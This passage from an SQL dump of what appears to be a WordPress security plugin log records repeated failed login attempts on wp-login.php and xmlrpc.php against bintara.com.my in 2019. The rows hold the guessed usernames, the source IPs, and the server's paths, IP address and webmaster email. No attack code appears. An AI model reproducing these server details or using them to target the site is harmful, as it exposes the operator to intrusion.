10:03:33',18262368,19558848,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.36.222'),(24501,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"59710\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCxUNK-omY048@iBsNRAwAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568715088.9003\";s:12:\"REQUEST_TIME\";s:10:\"1568715088\";}}','notice','2019-09-17 10:11:30','2019-09-17 10:11:29',17741760,19232312,'https://bintara.com.my/wp-login.php',1,0,'164.39.7.99'),(24502,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"60748\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCxVJS9022wVwVSW96H5AAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568715092.3519\";s:12:\"REQUEST_TIME\";s:10:\"1568715092\";}}','notice','2019-09-17 10:11:33','2019-09-17 10:11:32',18257848,19556592,'https://bintara.com.my/xmlrpc.php',1,0,'164.39.7.99'),(24503,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"59847\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCx6rIp53uPsY7BKArrBgAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568715242.5397\";s:12:\"REQUEST_TIME\";s:10:\"1568715242\";}}','notice','2019-09-17 10:14:04','2019-09-17 10:14:02',17738712,19229016,'https://bintara.com.my/wp-login.php',1,0,'37.187.75.56'),(24504,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"60095\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCx7Q99C9j9bhK9KplbDgAAAQc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568715245.5785\";s:12:\"REQUEST_TIME\";s:10:\"1568715245\";}}','notice','2019-09-17 10:14:07','2019-09-17 10:14:05',18257152,19556280,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.75.56'),(24505,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.159.210.58\";s:11:\"REMOTE_PORT\";s:5:\"59608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC21rIp53uPsY7BKArr4wAAAFM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568716502.9272\";s:12:\"REQUEST_TIME\";s:10:\"1568716502\";}}','notice','2019-09-17 10:35:04','2019-09-17 10:35:03',17737720,19227352,'https://bintara.com.my/wp-login.php',1,0,'213.159.210.58'),(24506,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.159.210.58\";s:11:\"REMOTE_PORT\";s:5:\"60804\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC22pS9022wVwVSW96MUgAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568716506.5256\";s:12:\"REQUEST_TIME\";s:10:\"1568716506\";}}','notice','2019-09-17 10:35:08','2019-09-17 10:35:07',18256904,19555376,'https://bintara.com.my/xmlrpc.php',1,0,'213.159.210.58'),(24507,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"59980\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC4JZS9022wVwVSW96NHQAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568716838.0066\";s:12:\"REQUEST_TIME\";s:10:\"1568716838\";}}','notice','2019-09-17 10:40:39','2019-09-17 10:40:38',17738488,19229832,'https://bintara.com.my/wp-login.php',1,0,'51.77.64.186'),(24508,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"60284\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC4KZS9022wVwVSW96NIAAAAAM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568716841.1579\";s:12:\"REQUEST_TIME\";s:10:\"1568716841\";}}','notice','2019-09-17 10:40:42','2019-09-17 10:40:41',18257400,19556064,'https://bintara.com.my/xmlrpc.php',1,0,'51.77.64.186'),(24509,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.18.157\";s:11:\"REMOTE_PORT\";s:5:\"39860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC4uw99C9j9bhK9KplcGAAAAQU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568716987.3977\";s:12:\"REQUEST_TIME\";s:10:\"1568716987\";}}','notice','2019-09-17 10:43:08','2019-09-17 